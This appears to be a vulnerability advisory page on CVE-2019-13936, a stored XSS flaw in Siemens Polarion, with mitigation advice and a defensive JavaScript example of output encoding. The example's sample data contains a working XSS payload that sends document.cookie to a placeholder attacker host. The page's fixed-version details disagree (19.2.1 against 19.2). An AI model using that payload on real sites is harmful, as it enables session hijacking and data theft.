Platform
other
Component
polarion
Fixed in
19.2.1
CVE-2019-13936 describes a persistent (stored) Cross-Site Scripting (XSS) vulnerability in the webclient component of Siemens AG Polarion. It allows an attacker to inject script into content that the web client later renders for other users, which can lead to unauthorized actions and data compromise. The issue affects all versions of Polarion prior to 19.2; Siemens addressed it in version 19.2.
Successful exploitation of CVE-2019-13936 lets an attacker execute arbitrary JavaScript in the browser session of any user who views the affected Polarion webclient page. From there the script runs with the victim's privileges: it can read data the victim can see (credentials entered into the page, project and requirement data), issue requests to Polarion as the victim (session hijacking or request forgery), and alter what the victim sees (defacement). The attack surface is broad, because every user who interacts with the vulnerable web client is potentially exposed. Because the XSS is stored, the injected payload lives on the server and is served to every viewer of the affected content, so a single injection can keep affecting users long after the attacker's own session has ended and until the stored content is cleaned up.
CVE-2019-13936 was publicly disclosed on November 27, 2019. There is no indication of active exploitation campaigns targeting this vulnerability. No public proof-of-concept (PoC) code has been widely released, although stored XSS payloads are generally easy to craft once the injection point is known. The CVSS base score of 3.5 (LOW) expresses severity, not likelihood; the EPSS estimate (0.34%) is the better indicator of exploitation probability and currently suggests exploitation is unlikely.
Organizations using Siemens Polarion for application lifecycle management, particularly those running versions prior to 19.2, are at risk. This includes teams relying on Polarion for requirements management, test management, and agile project tracking. The risk is highest where low-privileged or external users (contractors, customers filing tickets) can create or edit content that higher-privileged users later view, since that is exactly the path by which a stored XSS escalates; shared user accounts and weak access controls widen that path further.
Disclosure
Exploit status
EPSS
0.34% (57th percentile)
CVSS vector
The primary mitigation for CVE-2019-13936 is to upgrade to Polarion version 19.2 or later, which contains the fix. If upgrading immediately is not feasible, bear in mind that the actual fix (output encoding of stored content in the web client, backed by input validation) lies with the vendor and cannot be bolted on by an operator. Interim measures that are within an operator's control are a Web Application Firewall (WAF) with XSS rules in front of Polarion, restricting who may create or edit content that other users view, and limiting network access to the web client to trusted users. Regularly review and update Polarion's security configuration to minimize the attack surface.
Update Siemens AG Polarion to version 19.2 or later. This update fixes a persistent cross-site scripting (XSS) vulnerability that an attacker could exploit.
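The following is an added example, not code from Polarion or from the advisory, showing the vendor-side fix the mitigation paragraph refers to: the same stored field rendered once by raw string concatenation (how a stored XSS arises) and once with contextual output encoding, plus an input-validation check used as defence in depth. The "work item" records and the payload in them are constructed sample data; the field names are assumptions, not Polarion's data model.

```javascript
// Added example (not Polarion's code): contextual output encoding for a
// stored field rendered into HTML. The data model (a "work item" with a
// user-supplied title) is a constructed stand-in for whatever the real
// web client stores; the attacker host is a placeholder.

// Constructed sample: one benign title, one carrying a stored-XSS payload.
const STORED_WORK_ITEMS = [
  { id: 'WI-1', title: 'Login page returns 500 on empty password' },
  { id: 'WI-2', title: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
];

// Vulnerable rendering: attacker-controlled text is concatenated straight
// into markup. Because the title is stored server-side, the payload fires
// for every user who later views the list.
function renderVulnerable(items) {
  return items.map(i => `<li data-id="${i.id}">${i.title}</li>`).join('\n');
}

// Encoder for the HTML text and double-quoted attribute contexts. These five
// characters are sufficient for those two contexts only; data placed into a
// JavaScript string or a URL needs its own context-specific encoder.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Fixed rendering: every piece of stored data is encoded at the point where
// it enters the markup, so the browser shows the payload as text.
function renderEncoded(items) {
  return items.map(i => `<li data-id="${escapeHtml(i.id)}">${escapeHtml(i.title)}</li>`).join('\n');
}

// Invariant a unit test or code review can check: after removing the
// template's own <li> tags, no raw '<' or '>' may remain, because any that
// do came from stored data and will be parsed as markup by the browser.
function leaksRawMarkup(html) {
  const withoutTemplateTags = html.replace(/<\/?li[^>]*>/g, '');
  return /[<>]/.test(withoutTemplateTags);
}

// Input validation as defence in depth: reject titles that cannot be
// legitimate. This narrows the attack surface but is not a substitute for
// output encoding, since other fields and other input paths still exist.
function isValidTitle(title) {
  return typeof title === 'string' && title.length > 0 && title.length <= 200 && !/[<>]/.test(title);
}

// Stand-alone run: show the difference between the two renderers.
console.log('vulnerable leaks markup:', leaksRawMarkup(renderVulnerable(STORED_WORK_ITEMS)));
console.log('encoded leaks markup:  ', leaksRawMarkup(renderEncoded(STORED_WORK_ITEMS)));
```

The check in `leaksRawMarkup` is deliberately template-specific: it knows which tags the renderer itself emits and treats anything else as a leak, which is the property a regression test for a stored-XSS fix should assert rather than searching for particular payload strings.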
CVE-2019-13936 is a stored (persistent) Cross-Site Scripting (XSS) vulnerability in the webclient of Siemens Polarion, allowing attackers to inject malicious scripts that run in other users' browsers.
Yes, if you are running a Siemens Polarion version prior to 19.2, you are affected by this XSS vulnerability; 19.2 and later contain the fix.
Upgrade to Siemens Polarion version 19.2 or later to remediate the vulnerability. As interim measures, consider WAF rules that block XSS payloads and restricting who can author content that other users view.
There is no confirmed evidence of active exploitation campaigns targeting CVE-2019-13936 at this time.
Refer to the Siemens Security Notice: https://us-cert.cisa.gov/ics/advisories/SN-19-312